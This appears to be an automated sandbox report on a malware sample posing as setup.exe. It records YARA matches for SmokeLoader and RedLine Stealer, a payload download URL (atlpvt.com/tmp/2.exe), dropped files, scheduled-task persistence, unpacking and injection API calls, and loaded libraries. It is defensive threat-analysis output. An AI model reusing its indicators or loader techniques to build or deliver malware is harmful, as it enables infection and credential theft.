Source: explorer.exe, 00000009.00000000.2785361749.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000000.2783388537.0000000007637000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000003.3094724736.00000000035FA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.2782356974.00000000035FA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.coml
Source: axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atlpvt.com/
Source: axplong.exe, 00000007.00000003.2705138953.00000000012A9000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3273525737.000000000126E000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atlpvt.com/tmp/2.exe
Source: axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atlpvt.com/tmp/2.exe(mh
Source: axplong.exe, 00000007.00000002.3273525737.0000000001259000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://atlpvt.com/tmp/2.exe6mv
Source: explorer.exe, 00000009.00000000.2785361749.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: explorer.exe, 00000009.00000000.2785361749.0000000009D42000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000009.00000000.2788512315.000000000C460000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000009.00000000.2785361749.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/)s
Source: explorer.exe, 00000009.00000000.2785361749.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comon

Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown

HTTPS traffic detected: 58.65.168.132:443 -> 192.168.2.5:49713 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000008.00000002.2807030321.000000000247D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2807137209.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.3041945625.000000000248D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000000A.00000002.3042190062.0000000004080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

PE file contains section with special chars

Source: setup.exe	Static PE information: section name:
Source: setup.exe	Static PE information: section name: .idata
Source: setup.exe	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name:
Source: axplong.exe.0.dr	Static PE information: section name: .idata
Source: axplong.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_00402FA2 RtlCreateUserThread,NtTerminateProcess,	8_2_00402FA2
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_00401502 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_00401502
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004014ED
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_00402FA2 RtlCreateUserThread,NtTerminateProcess,	10_2_00402FA2
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_00401502 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	10_2_00401502
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_004014ED NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	10_2_004014ED

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Windows\Tasks\axplong.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0023E440	7_2_0023E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00273068	7_2_00273068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00234CF0	7_2_00234CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00267D83	7_2_00267D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0027765B	7_2_0027765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00234AF0	7_2_00234AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00278720	7_2_00278720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00276F09	7_2_00276F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_0027777B	7_2_0027777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 7_2_00272BD0	7_2_00272BD0
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Code function: 8_2_0040208D	8_2_0040208D
Source: C:\Users\user\AppData\Roaming\wsjctfw	Code function: 10_2_0040208D	10_2_0040208D

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe 78305C8B5E8EAD6989A0AF09FC6ED8F2FF1B246C0487DFA78FB5B155B554CAE9

Source: setup.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000008.00000002.2807030321.000000000247D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.3042307011.00000000041F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2807137209.00000000025C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000008.00000002.2807434237.0000000003FB1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000008.00000002.2807261625.0000000003F90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.3042208833.0000000004090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000A.00000002.3041945625.000000000248D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000A.00000002.3042190062.0000000004080000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23

Source: 2[1].exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 2.exe.7.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: wsjctfw.9.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: setup.exe	Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: setup.exe	Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9972113419618529
Source: axplong.exe.0.dr	Static PE information: Section: qzeqbxes ZLIB complexity 0.9941618610314105

Source: axplong.exe.0.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: setup.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/6@10/2

Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe

Code function: 8_2_02483D92 CreateToolhelp32Snapshot,Module32First,

8_2_02483D92

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\2[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c

Source: C:\Users\user\Desktop\setup.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: setup.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\setup.exe

File read: C:\Users\user\Desktop\setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000030001\2.exe "C:\Users\user\AppData\Local\Temp\1000030001\2.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\wsjctfw C:\Users\user\AppData\Roaming\wsjctfw
Source: C:\Users\user\Desktop\setup.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000030001\2.exe "C:\Users\user\AppData\Local\Temp\1000030001\2.exe"	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: windows.cloudstore.schema.shell.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\wsjctfw	Section loaded: msvcr100.dll	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: setup.exe

Static file information: File size 1898496 > 1048576

Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: setup.exe

Static PE information: Raw size of qzeqbxes is bigger than: 0x100000 < 0x19de00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\setup.exe	Unpacked PE file: 0.2.setup.exe.760000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 2.2.axplong.exe.230000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 3.2.axplong.exe.230000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Unpacked PE file: 7.2.axplong.exe.230000.0.unpack :EW;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;qzeqbxes:EW;qgghuozc:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1000030001\2.exe	Unpacked PE file: 8.2.2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cus:R;.rufaxu:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\wsjctfw	Unpacked PE file: 10.2.wsjctfw.400000.0.unpack .text:ER;.rdata:R;.data:W;.cus:R;.rufaxu:W;.rsrc:R; vs .text:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: axplong.exe.0.dr	Static PE information: real checksum: 0x1da2f0 should be: 0x1d017e
